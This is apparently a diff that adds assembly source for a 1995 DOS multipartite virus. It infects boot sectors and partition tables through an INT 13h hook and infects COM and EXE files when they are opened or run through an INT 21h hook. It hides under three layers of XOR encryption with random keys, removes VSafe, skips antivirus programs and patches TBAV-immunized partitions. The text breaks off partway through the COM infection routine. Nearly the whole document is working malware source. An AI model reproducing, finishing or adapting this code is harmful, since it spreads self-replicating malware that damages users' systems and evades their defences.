+;
+;  - Similarities:   Alive (File Virus), Junkie (Multipartite Virus)
+;
+;
+;
+;
+;
+;  Additional Notes:
+; -------------------
+;
+;  Infected objects are not detected by SSC Anti-Virus Scanner and
+;  Analyzer.
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;
+;----------------------------------------------------------------------------
+
+
+Ofs             equ     Offset
+Cmt             equ     Comment
+B               equ     byte ptr
+W               equ     word ptr
+
+Directory       STRUC
+DS_Drive        db ?
+DS_File_Name    db 8 dup(0)
+DS_File_Ext     db 3 dup(0)
+DS_File_Attr    db ?
+DS_Reserved     db 10 dup(0)
+DS_Time         dw ?
+DS_Date         dw ?
+DS_Start_Clust  dw ?
+DS_File_Size    dd ?
+Directory       ENDS
+
+FCB             STRUC
+FCB_Drive       db ?
+FCB_File_Name   db 8 dup(0)
+FCB_File_Ext    db 3 dup(0)
+FCB_Block       dw ?
+FCB_Rec_Size    dw ?
+FCB_File_Size   dd ?
+FCB_File_Date   dw ?
+FCB_File_Time   dw ?
+FCB_Reserved    db 8 dup(0)
+FCB_Record      db ?
+FCB_Random      dd ?
+FCB             ENDS
+
+DTA             STRUC
+DTA_Reserved    db 21 dup(0)
+DTA_File_Attr   db ?
+DTA_File_Time1  db ?                    ; = seconds
+DTA_File_Time2  db ?
+DTA_File_Date   dw ?
+DTA_File_Size   dd ?
+DTA_File_Name   db 13 dup(0)
+DTA             ENDS
+
+SFT             STRUC
+SFT_Reserved1   dw ?    ; 0
+SFT_Open_Mode   dw ?    ; 2
+SFT_File_Attr   db ?    ; 4
+SFT_Reserved2   dw ?    ; 5
+SFT_Reserved3   dd ?    ; 7
+SFT_Reserved4   dw ?    ; 11
+SFT_File_Time   dw ?    ; 13
+SFT_File_Date   dw ?    ; 15
+SFT_File_SizeLo dw ?    ; 17
+SFT_File_SizeHi dw ?    ; 19
+SFT_Curr_OfsLo  dw ?    ; 21
+SFT_Curr_OfsHi  dw ?    ; 23
+SFT_Reserved7   dw ?    ; 25
+SFT_Reserved8   dd ?    ; 27
+SFT_Reserved9   db ?    ; 31
+SFT_File_Name   db 8 dup(?)     ; 32 = 20h
+SFT_File_Ext    db 3 dup(?)     ; 40 = 28h
+SFT             ENDS
+
+ExeH            STRUC
+Buf_0h          dw 0    ; "MZ" oder "ZM" (selten)
+Buf_2h          dw 0    ; Last page size
+Buf_4h          dw 0    ; Size in pages
+Buf_6h          dw 0
+Buf_8h          dw 0
+Buf_ah          dw 0
+Buf_ch          dw 0
+Buf_eh          dw 0    ; SS
+Buf_10h         dw 0    ; SP
+Buf_12h         dw 0    ; CheckSum
+Buf_14h         dw 0    ; IP
+Buf_16h         dw 0    ; CS
+Buf_18h         dw 0    ; WINDOWS Marker
+ExeH            ENDS
+
+
+
+Flag_Exec_Infection     equ     1
+
+ofs                     equ     offset
+cmt                     equ     comment
+
+Reloc                   =       ofs Vir_Start
+Camouf                  =       2
+Enc_Word_Length         =       (Virus_Length/2)+1
+Virus_Length            =       4*512
+Header_Length           =       18h
+
+File_Type_COM           =       byte (Restore_COM-File_Type)-2
+File_Type_EXE           =       byte (Restore_EXE-File_Type)-2
+
+Media_Descriptor_144    =       0F0h
+Media_Descriptor_120    =       0F9h
+
+Vir_Len_Sectors         =       4
+
+Vir_Harddisk_Track      =       0
+Vir_Harddisk_Head       =       0
+Vir_Harddisk_Sector     =       4
+
+Vir_Floppy_120_Track    =       79
+Vir_Floppy_120_Head     =       1
+Vir_Floppy_120_Sector   =       6
+
+Vir_Floppy_144_Track    =       79
+Vir_Floppy_144_Head     =       1
+Vir_Floppy_144_Sector   =       15
+
+
+Names_HDD_Track         =       0
+Names_HDD_Head          =       0
+Names_HDD_Sector        =       3
+
+
+; in bytes
+
+F_Min_LengthCOM         =       3000
+F_Max_LengthCOM         =       50000
+
+; in pages
+
+F_Min_LengthEXE         =       6               ; = 3 kb
+F_Max_LengthEXE         =       2000            ; = 1000 kb
+
+
+Time_Stamp              =       13
+TOM_Decrement_value     =       5
+
+
+        .286
+CODE    SEGMENT BYTE PUBLIC 'CODE'
+ASSUME  CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
+        ORG     0100h
+
+
+Sample:
+        jmp     Vir_Start
+
+;----------------------------------------------------------------------------
+; allways start at seg:0000
+
+        org     100h+ 1*16
+;----------------------------------------------------------------------------
+
+Vir_Start:
+
+;----------------------------------------------------------------------------
+; 1st encryption layer (outer)
+;----------------------------------------------------------------------------
+                cld
+                mov     CX,Enc_Word_Length
+
+                MOV     bp,1234h
+                ORG     $-2
+E1_Idx_Val      dw      ofs E1_Encrypted_Code
+
+                mov     ax,1234h
+                ORG     $-2
+E1_Key_Val      dw      0
+
+                db      081h,3eh
+E1_Dec_Loop:
+                XOR     Word Ptr cs:[bp],ax
+
+                inc     bp
+                inc     bp
+
+                dec     cx
+
+                or      cx,cx
+                jz      E1_Loop_done
+
+                jmp     short E1_Dec_Loop
+                db      09ah                    ;=CALL FAR
+E1_Loop_done:
+;----------------------------------------------------------------------------
+
+
+E1_Encrypted_Code:
+
+
+;----------------------------------------------------------------------------
+; 2nd encryption layer (inner)
+;----------------------------------------------------------------------------
+                mov     cx,(Enc_Word_Length/2) +1
+
+                MOV     si,1234h
+                ORG     $-2
+E2_Idx_Val      dw      ofs E2_Encrypted_Code
+
+                mov     ax,1234h
+                ORG     $-2
+E2_Key_Val_1    dw      0
+
+                mov     bx,1234h
+                ORG     $-2
+E2_Key_Val_2    dw      0
+
+E2_Dec_Loop:
+                xor     w cs:[si],ax
+                inc     si
+                inc     si
+
+                xor     w cs:[si],bx
+                inc     si
+                inc     si
+
+                loop    short E2_Dec_Loop
+
+;----------------------------------------------------------------------------
+
+
+E2_Encrypted_Code:
+
+
+;----------------------------------------------------------------------------
+; 3rd encryption layer (innerst)
+;----------------------------------------------------------------------------
+                mov     cx,(Enc_Word_Length/3)+1
+
+                MOV     si,1234h
+                ORG     $-2
+E3_Idx_Val      dw      ofs E3_Encrypted_Code
+
+                mov     ax,1234h
+                ORG     $-2
+E3_Key_Val_1    dw      0
+
+                mov     bx,1234h
+                ORG     $-2
+E3_Key_Val_2    dw      0
+
+                mov     dx,1234h
+                ORG     $-2
+E3_Key_Val_3    dw      0
+
+E3_Dec_Loop:
+                xor     w cs:[si],ax
+                inc     si
+                inc     si
+
+                xor     w cs:[si],bx
+                inc     si
+                inc     si
+
+                xor     w cs:[si],dx
+                inc     si
+                inc     si
+;Chg1+2
+                add     ax,1234h
+                ORG     $-2
+E3_Key_Change_1 dw      0
+
+                add     bx,1234h
+                ORG     $-2
+E3_Key_Change_2 dw      0
+
+                loop    short E3_Dec_Loop
+;----------------------------------------------------------------------------
+
+
+E3_Encrypted_Code:
+
+
+;----------------------------------------------------------------------------
+        cld
+        mov     ax,cs
+        or      ax,ax
+        jnz     Run_file
+        jmp     Its_boottime
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+; Restore program-header, the registers and go back to the program
+
+Exit_File:
+                pop     es ds
+
+
+                db      0EBh                    ; JMP-short-opcode
+File_Type       db      File_Type_COM
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; restore the COM-host-file
+
+Restore_COM:
+        MOV     DI,100h
+        push    di
+
+        MOV     Word Ptr cs:[DI],1234h
+        ORG     $-2
+Rest1   dw      0c3c3h
+
+        MOV     byte Ptr cs:[DI+2],12h
+        ORG     $-1
+Rest2   db      0c3h
+
+ZeroRegsForHost:
+        mov     cx,8
+nullup: push    0
+        loop    nullup
+        popa
+
+        ret
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; restore the EXE-host-file
+
+Restore_EXE:
+        mov     ax,ds                           ; DS = PSP !
+        add     ax,10h                          ; + 100h bytes of PSP
+        add     cs:[bx+ofs Old_CS -Reloc],ax    ; = new CS
+        add     ax,0000                         ; + old SS
+        org     $-2
+Old_SS  dw      ?
+        cli
+        mov     ss,ax                           ; set SS
+        mov     sp,0000                         ; set SP
+        org     $-2
+Old_SP  dw      ?
+        sti
+
+        call    ZeroRegsForHost
+
+        db      0EAh                            ; = JMP Old_CS:Old_IP
+
+; In an EXE - header-values are stored here
+
+Old_ExeValues:
+Old_IP          dw      0
+Old_CS          dw      0
+;----------------------------------------------------------------------------
+
+
+        db      " PSYCHo-TECH GMBH 1995 "
+
+;----------------------------------------------------------------------------
+Run_File:
+
+; relocate
+        CALL    Delta
+Delta:
+        POP     BX
+        SUB     BX,1234h
+        ORG     $-2
+        dw      ofs Delta -Reloc
+
+; save PSP
+        push    ds es
+
+
+; assume segments
+        push    cs cs
+        pop     ds es
+
+; prepare the retf to Exit_File
+
+        push    cs
+        lea     ax,cs:[bx+ofs Exit_File -Reloc]
+        push    ax
+
+; change CS, so we start at ofs 0 not 100h
+
+        mov     ax,cs
+        SHR     BX,4
+        ADD     AX,BX
+        PUSH    AX
+        MOV     AX,ofs Continue -Reloc
+        PUSH    AX
+        RETF
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Gag:
+        push    ax ds
+        in      al,40h
+        test    al,1
+        jz      Skip_Gag
+
+        mov     ax,0b800h
+        mov     ds,ax
+        mov     word ptr ds:[(79*2)],00cf9h     ;= lightred point "ù"
+Skip_Gag:
+        pop     ds ax
+        ret
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Its_boottime:
+
+        call    Gag
+
+        xor     di,di
+        MOV     DS,DI
+
+        mov     si,7c00h+512
+
+; decrement RAM by xx kB
+
+        SUB     Word Ptr DS:[0413h],TOM_Decrement_value
+        MOV     AX,DS:[0413h]
+        MOV     BX,40h
+        MUL     BX
+        MOV     ES,AX
+
+; move virus to TOM (xxxx bytes)
+
+        MOV     CX,Virus_Length
+        CLD
+        REPZ    MOVSB
+
+; set new INT 13h and 1Ch
+
+        CLI
+
+        MOV     SI,4*13h
+        MOV     DI,ofs Old_Int_13 -Reloc
+        MOV     AX,ofs New_Int_13 -Reloc
+        CALL    Get_Set_Int
+
+        MOV     Byte Ptr ES:[ofs Got_Int_21 -Reloc],0
+
+        MOV     SI,4*1ch
+        MOV     DI,ofs Old_Int_1c -Reloc
+        MOV     AX,ofs New_Int_1c -Reloc
+        CALL    Get_Set_Int
+
+        STI
+
+; save INT 21h
+
+        MOV     DI,ofs Old_Int_21 -Reloc
+        MOV     SI,4*21h
+        MOVSW
+        MOVSW
+
+        mov     di,7c00h
+
+; prepare RETF to orig PAR/BS
+
+        PUSH    CS      ;=0
+        PUSH    DI      ;=7c00h
+
+        push    es
+        push    ofs Boot_Finish -Reloc
+
+        PUSH    CS
+        POP     ES
+
+; restore the JUMP-Word and the patched PAR/BS
+
+        MOV     SI,7c00h + 512 + BS_First_word -Reloc
+        MOVSW
+
+        mov     di,7c00h + 60h   ; offset of the patch-area
+        CALL    Call_Move_20
+
+; Patch the TBAV immunized partition
+
+        cmp     w cs:[7c00h+0dfh],"hT"
+        jne     no_TB_partition
+        mov     b cs:[7c00h+73h],0
+
+no_TB_partition:
+
+; goto Boot_Finish / infect C:
+
+        retf
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+New_Int_13:
+
+        cmp     ax,0201h                        ; reading ?
+        JNZ     Jump_Old_Int_13
+
+        CMP     CX,0001h                        ; sector 1 and Track 0 ?
+        JNZ     Jump_Old_Int_13
+
+        or      dh,dh                           ; head 0 ?
+        jnz     Jump_Old_Int_13
+
+        pusha
+        PUSH    DS
+        PUSH    ES
+
+        CALL    Int13_Works
+
+        POP     ES
+        POP     DS
+        popa
+
+Jump_Old_Int_13:
+        jmp     dword ptr cs:(ofs Old_Int_13 -Reloc)
+
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Call_Old_Int_13:
+        PUSHF
+        call    dword ptr cs:(ofs Old_Int_13 -Reloc)
+        RET
+;----------------------------------------------------------------------------
+
+
+        db      " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "
+
+
+;----------------------------------------------------------------------------
+Continue:
+        PUSH    DS
+        PUSH    ES
+
+        XOR     AX,AX
+        MOV     DS,AX
+
+        PUSH    CS
+        POP     ES
+
+; save int 13h
+
+        MOV     DI,ofs Old_Int_13 -Reloc
+        MOV     SI,4*13h
+        CLD
+        MOVSW
+        MOVSW
+        JMP     Short Read_Drive_C
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Boot_Finish:
+        PUSH    DS
+        PUSH    ES
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Read_Drive_C:
+        MOV     AH,02h
+        MOV     DL,80h
+
+        CALL    Int13_Works     ; infect drive C
+
+        POP     ES
+        POP     DS
+
+        XOR     AX,AX
+        XOR     BX,BX
+        retf
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Int13_Works:
+
+        PUSH    CS
+        POP     DS
+        PUSH    CS
+        POP     ES
+
+        CALL    Read_or_Write_BS_from_A
+        jnb     oky                             ; Goto_Ret
+        jmp     Goto_Ret
+oky:
+
+
+        MOV     DI,ofs Buffer + 60h -Reloc
+
+; check if BS is infected
+
+        CMP     Word Ptr [SI],05EEBh    ; SI=@buffer
+        JNZ     BS_not_infected
+
+        CMP     Word Ptr [DI],0FF33h    ; == xor di,di
+        JZ      Goto_Ret
+
+BS_not_infected:
+
+; test if it is Harddisk or floppy
+
+        cmp     dl,79h
+        ja      Not_Floppy
+
+
+; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy
+
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144
+        JZ      Found_ID_F0
+
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120
+        JNZ     Goto_Ret
+
+Large_floppy:
+        MOV     CL,Vir_Floppy_120_Sector
+        JMP     Short Floppy_Disk
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; 1.44 floppy found
+
+Found_ID_F0:
+        MOV     AX,40h
+        MOV     DS,AX
+
+; 0:490h == AT Drive 0 status
+
+        CMP     Byte Ptr DS:[0090h],97h
+        JZ      Large_Floppy
+
+; it is 1.44 Mb
+
+        MOV     CL,Vir_Floppy_144_Sector
+
+Floppy_Disk:
+        PUSH    CS
+        POP     DS
+
+        MOV     CH,Vir_Floppy_120_Track
+        JMP     Short Head_01
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Not_floppy:
+        MOV     CX,Vir_Harddisk_Sector
+        JMP     Short Head_00
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Head_01:
+        MOV     DH,Vir_Floppy_120_Head
+Head_00:
+        MOV     DS:[ofs Ptc_CX -Reloc],CX   ; patch the PAR
+        MOV     DS:[ofs Ptc_DX -Reloc],DX
+
+        PUSH    DX
+        PUSH    CX
+        PUSH    SI
+        PUSH    DI
+
+; Move the JMP-Op to the beginning of BS/PAR
+
+        MOV     DI,ofs BS_first_word -Reloc     ; SI=ofs buffer
+        MOVSW
+        POP     SI
+
+        CALL    Call_Move_20
+
+        MOV     SI,DI
+        POP     DI
+        MOVSW
+
+        add     di,60h-2
+        CALL    Call_Move_20                    
+
+; write BS
+
+        MOV     AX,0301h
+        PUSH    AX
+        CALL    Read_or_Write_BS_from_A
+
+        POP     AX
+        POP     CX
+        POP     DX
+
+        MOV     AL,Vir_Len_Sectors
+        MOV     BX,ofs Buffer -Reloc
+        JB      Goto_Ret
+
+
+        MOV     Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf
+        MOV     Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc
+        MOV     Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc
+
+
+        CALL    Encrypt_Virus
+
+        CALL    Call_Old_Int_13
+Goto_Ret:
+        RET
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+; read the PAR/BS from drive
+;----------------------------------------------------------------------------
+
+Read_or_Write_BS_from_A:
+        MOV     AL,01h
+        MOV     CX,0001h
+        MOV     DH,0
+        MOV     BX,ofs Buffer -Reloc
+        MOV     SI,BX
+
+        PUSH    DX
+        CALL    Call_Old_Int_13
+        POP     DX
+
+        RET
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Call_Move_20:
+        MOV     CX,32
+        CLD
+        REPZ    MOVSb
+        RET
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Get_Set_Int:
+
+        PUSH    SI
+        MOVSW
+        MOVSW
+        POP     SI
+        MOV     [SI],AX
+        MOV     [SI+2],ES
+        RET
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Get_Random:
+
+;;        xor     ax,ax
+;;        ret
+
+        push    cx dx
+
+        in      al,40h
+        mov     cl,al
+
+        xor     ax,ax
+        int     1ah
+
+        in      al,40h
+        mov     ah,al
+
+        in      al,40h
+        rol     ax,cl
+
+        pop     dx cx
+        ret
+;----------------------------------------------------------------------------
+
+
+
+;============================================================================
+Encrypt_Virus:
+
+        pusha
+        push    ds es
+
+; get (random) key-values
+
+; L1
+        call    Get_Random
+        MOV     word ptr cs:[ofs E1_Key_Val -Reloc],ax
+
+; L2
+        call    Get_Random
+        MOV     word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax
+
+        call    Get_Random
+        MOV     word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax
+
+; L3
+        call    Get_Random
+        MOV     word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax
+
+        call    Get_Random
+        MOV     word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax
+
+        call    Get_Random
+        MOV     word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax
+
+        call    Get_Random
+        MOV     word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax
+
+        call    Get_Random
+        MOV     word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax
+
+
+; move bytes
+
+        PUSH    CS
+        POP     ES
+
+        MOV     SI,1234h
+        org     $-2
+        dw      0
+
+        MOV     DI,ofs Buffer -Reloc
+        MOV     CX,(ofs Encrypted_Code_End - ofs Vir_Start)
+        REPZ    MOVSB
+
+
+; fill
+
+        pusha
+        mov     cx,2*80
+Fill_random:
+        in      al,40h
+        cld
+        stosb
+        loop    Fill_random
+        popa
+
+
+;----------------------------------------------------------------------------
+; encrypt innerst layer E3
+
+        MOV     w ax,cs:[ofs E3_Key_Val_1 -Reloc]
+        MOV     w bx,cs:[ofs E3_Key_Val_2 -Reloc]
+        MOV     w dx,cs:[ofs E3_Key_Val_3 -Reloc]
+
+;chg1+2
+        MOV     w di,cs:[ofs E3_Key_Change_1 -Reloc]
+        MOV     w bp,cs:[ofs E3_Key_Change_2 -Reloc]
+
+        MOV     si,ofs Buffer -Reloc
+        ADD     si,ofs E3_Encrypted_Code -Reloc
+
+        MOV     CX,(Enc_Word_Length/3) +1
+
+C3_Enc_Loop:
+        XOR     cs:[si],ax
+        INC     si
+        INC     si
+
+        XOR     cs:[si],bx
+        INC     si
+        INC     si
+
+        XOR     cs:[si],dx
+        INC     si
+        INC     si
+;chg1
+        add     ax,di
+;chg2
+        add     bx,bp
+
+        LOOP    C3_Enc_Loop
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+; encrypt inner layer E2
+
+        MOV     w ax,cs:[ofs E2_Key_Val_1 -Reloc]
+        MOV     w bx,cs:[ofs E2_Key_Val_2 -Reloc]
+
+        MOV     si,ofs Buffer -Reloc
+        ADD     si,ofs E2_Encrypted_Code -Reloc
+
+        MOV     CX,(Enc_Word_Length/2) +1
+
+C2_Enc_Loop:
+        XOR     cs:[si],ax
+        INC     si
+        INC     si
+
+        XOR     cs:[si],bx
+        INC     si
+        INC     si
+
+        LOOP    C2_Enc_Loop
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+; encrypt outer layer E1
+
+        MOV     word ptr bx,cs:[ofs E1_Key_Val -Reloc]
+
+        MOV     DI,ofs Buffer -Reloc
+        ADD     DI,ofs E1_Encrypted_Code -Reloc
+
+        MOV     CX,Enc_Word_Length
+
+Enc_Loop:
+        XOR     cs:[DI],BX
+        INC     DI
+        INC     DI
+        LOOP    Enc_Loop
+;----------------------------------------------------------------------------
+
+
+Mult_POP:
+        pop     es ds
+        popa
+
+        RET
+;============================================================================
+
+
+
+;----------------------------------------------------------------------------
+New_Int_1c:
+        CMP     Byte Ptr CS:[ofs Got_Int_21 -Reloc],1
+        JZ      Jump_Int_1c
+
+        pusha
+        push    ds es
+
+        MOV     SI,4*21h
+        XOR     AX,AX
+        MOV     DS,AX
+
+; load int 20h seg and compare if below 800h
+
+        MOV     AX,DS:[4*20h +2]
+
+        CMP     AX,0000h
+        JZ      Exit_Int_1c
+
+        CMP     AX,800h
+        JA      Exit_Int_1c
+
+; cmp with int 21h seg
+
+        CMP     [SI+02h],AX
+        JNZ     Exit_Int_1c
+
+; cmp with int 27h seg
+
+        CMP     DS:[4*27h +2],AX
+        JNZ     Exit_Int_1c
+
+; cmp with int 2Fh seg
+
+        CMP     DS:[4*2Fh +2],AX
+        JNZ     Exit_Int_1c
+
+; ok, now hook int 21h
+
+        CLI
+        MOV     DI,ofs Old_Int_21 -Reloc
+        PUSH    CS
+        POP     ES
+        MOV     AX,ofs New_Int_21 -Reloc
+        CALL    Get_Set_Int
+
+; set the flag for it
+        MOV     Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h
+        STI
+
+; get int 2f vector
+
+        push    0
+        pop     ds
+        mov     w ax,ds:[4*2fh]
+        mov     w cs:[ofs Old_Int_2f -Reloc],ax
+        mov     w ax,ds:[4*2fh+2]
+        mov     w cs:[ofs Old_Int_2f -Reloc+2],ax
+
+
+
+Exit_Int_1c:
+
+        pop     es ds
+        popa
+
+Jump_Int_1c:
+        jmp     dword ptr cs:(ofs Old_int_1c -Reloc)
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+New_Int_21:
+
+
+IF      Flag_Exec_Infection
+        CMP     AX,4B00h
+        JZ      Control_Operation
+ENDIF
+
+
+        CMP     AH,3Dh
+        JZ      Control_Operation
+
+Exit_Int_21:
+        jmp     dword ptr cs:(ofs Old_Int_21 -Reloc)
+;----------------------------------------------------------------------------
+
+
+;----------------------------------------------------------------------------
+Control_Operation:
+
+        pusha
+        push    ds es
+
+Not_Ext_Open:
+        xchg    ax,cx
+        xor     ax,ax
+
+        call    Deinstall_Vsafe
+
+; Hook int 24h
+
+        PUSH    DS
+        MOV     DS,AX
+        LES     AX,DS:[4*24h]
+        MOV     Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc
+        MOV     DS:[4*24h +2],CS
+        POP     DS
+
+        PUSH    ES
+        PUSH    AX
+
+; open file
+
+        MOV     AX,3D00h
+        call    Call_Old_Int21
+        jb      File_Error
+
+        mov     bx,ax
+
+        PUSH    CS
+        POP     DS
+
+; get SFT
+
+        PUSH    BX
+        MOV     AX,1220h
+        call    Call_Old_Int2F                 ; INT     2Fh
+
+        MOV     AX,1216h
+        MOV     BL,ES:[DI]
+        call    Call_Old_Int2F                 ; INT     2Fh
+        POP     BX
+
+        JB      Close_Exit
+
+; skip AV-programs ?
+
+        call    Check_If_AV_Name
+        jz      goto_close_exit
+
+
+; test if executable-file
+
+        CMP     Word Ptr ES:[DI+28h],"OC"
+        JZ      Is_COM
+
+        CMP     Word Ptr ES:[DI+28h],"XE"
+        JZ      Is_EXE
+
+goto_close_exit:
+        JMP     Short Close_Exit
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Is_COM:
+Is_EXE:
+
+; Check if infected
+        mov     ax,es:[di.SFT_File_Time]
+        and     al,00011111b
+        cmp     al,Time_Stamp
+        jz      Close_Exit
+
+        PUSH    ES
+        PUSH    DI
+
+; Datum/Zeit sichern
+        mov     ax,es:[di.SFT_File_Time]
+        mov     cs:[ofs Old_Time -Reloc],ax
+        mov     ax,es:[di.SFT_File_Date]
+        mov     cs:[ofs Old_Date -Reloc],ax
+
+; Get file length directly from the SFT and save it
+        mov     ax,es:[di+SFT_File_SizeLo]
+        mov     cs:[ofs File_SizeLo -Reloc], ax
+        mov     ax,es:[di.SFT_File_SizeHi]
+        mov     cs:[ofs File_SizeHi -Reloc], ax
+
+; Force read/write mode
+        mov     word ptr es:[di.SFT_Open_Mode],2
+
+        CALL    Read_Infect
+
+        POP     DI
+        POP     ES
+
+Close_Exit:
+
+        MOV     AH,3Eh
+        INT     21h
+
+File_Error:
+        XOR     SI,SI
+        MOV     DS,SI
+
+; restore INT 24h
+
+        POP     AX
+        POP     ES
+
+        MOV     DS:[4*24h],AX
+        MOV     DS:[4*24h +2],ES
+
+
+        pop     es ds
+        popa
+
+        JMP     Exit_Int_21
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+goto_Infect_Ret:
+        jmp     Infect_Ret
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Process_EXE:
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE
+
+; save handle
+        mov     word ptr cs:[ofs Handle -Reloc],bx
+
+; Dont infect to big/small EXE-files!
+        mov     word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc]  ; EXE size in 512 byte pages
+        cmp     AX,F_Min_LengthEXE                              ; Don't infect files less than xxxx pages
+        JB      goto_Infect_Ret
+        cmp     AX,F_Max_LengthEXE                              ; Or bigger than xxxx pages
+        JA      goto_Infect_Ret
+
+; save handle
+        push    bx
+
+; seek to EOF
+
+        CALL    Seek_EOF
+
+
+; It's OK!  Process it now !
+        les     ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc]    ;Entry_Point_Disp
+        mov     cs:[ofs Old_IP -Reloc],ax
+        mov     cs:[ofs Old_CS -Reloc],es
+
+        les     ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc]     ;Stack_Disp
+        mov     cs:[ofs Old_SS -Reloc],ax
+        mov     cs:[ofs Old_SP -Reloc],es
+
+        mov     ax,cs:[ofs File_Buffer.Buf_8h -Reloc]  ; = Header size in paras
+        mov     cl,4
+        shl     ax,cl                                    ; Convert to byte-format
+
+; Get file size from SFT
+        push    ax                                       ; Save header size
+        mov     ax,cs:[ofs File_SizeLo -Reloc]
+        mov     dx,cs:[ofs File_SizeHi -Reloc]
+
+; add the padding-number
+        mov     cx,cs:[ofs File_SizeLo -Reloc]
+        MOV     CH,CL
+        MOV     CL,16
+        SUB     CL,CH
+        AND     CX,1+2+4+8
+        add     ax,cx
+
+; save the padding-number
+        mov     cs:[ofs Padded -reloc],cx
+
+        pop     bx                                       ; = Header size
+
+        sub     ax,bx                   ; DX:AX := file size - header size
+        sbb     dx,0
+
+        mov     cx,16                   ; Convert to seg:ofs format
+
+        div     cx                      ; DX:AX := (DX:AX) / 10h
+
+        or      dx,dx                   ; IP
+        jz      was_rounded
+
+        xor     dx,dx
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS
+
+        inc     word ptr cs:[ofs File_Buffer.Buf_16h -Reloc]                 ; CS
+        jmp     rounded
+
+was_rounded:
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS
+
+rounded:
+        inc     ax                                                  ; Avoid the "K" TB-flag (seems unecessary)
+        mov     word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax      ; New SS
+        mov     word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0      ; New SP
+
+        mov     ax,cs:[ofs File_SizeLo -Reloc]
+        mov     dx,cs:[ofs File_SizeHi -Reloc]
+
+; add the padding-number
+        add     ax,cs:[ofs Padded -reloc]
+        add     dx,0
+
+
+        add     ax,Virus_Length         ; Lo-word
+        adc     dx,0                    ; Hi-word
+
+        push    ax                      ; Lo-word
+        shr     ax,9                    ;
+        ror     dx,9
+        stc
+        adc     dx,ax
+        pop     ax
+
+        and     ah,1                                           ; Mod 512
+        mov     cs:[ofs File_Buffer.Buf_4h -Reloc],dx               ; Size in pages (rounded up)
+        mov     cs:[ofs File_Buffer.Buf_2h -Reloc],ax               ; Size of last page (in bytes)
+
+        push    cs cs
+        pop     ds es
+
+
+        mov     word ptr bx,cs:[ofs Handle -Reloc]
+        mov     ax,cs:[ofs File_SizeLo -Reloc]
+
+        CALL    Padding
+
+; Construct index for decryptor
+
+        PUSH    AX
+
+        MOV     word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf
+        MOV     word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)
+        MOV     word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)
+
+        POP     AX
+
+        pop     bx
+        jmp     Attach
+;----------------------------------------------------------------------------
+
+
+
+;----------------------------------------------------------------------------
+Read_Infect:
+
+        CALL    Seek_TOF
+
+; read xx bytes
+
+        MOV     AH,3Fh
+        MOV     CX,Header_Length
+        MOV     DX,ofs File_buffer -Reloc
+        INT     21h
+        jnb     read_ok
+        jmp     Infect_Ret
+
+read_ok:
+        cmp     word ptr cs:[ofs File_buffer -Reloc],"ZM"
+        jnz     Process_COM
+        jmp     Process_EXE
+
+;----------------------------------------------------------------------------
+Process_COM:
+
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_COM
+
+
+; seek to EOF
+
+        CALL    Seek_EOF
+
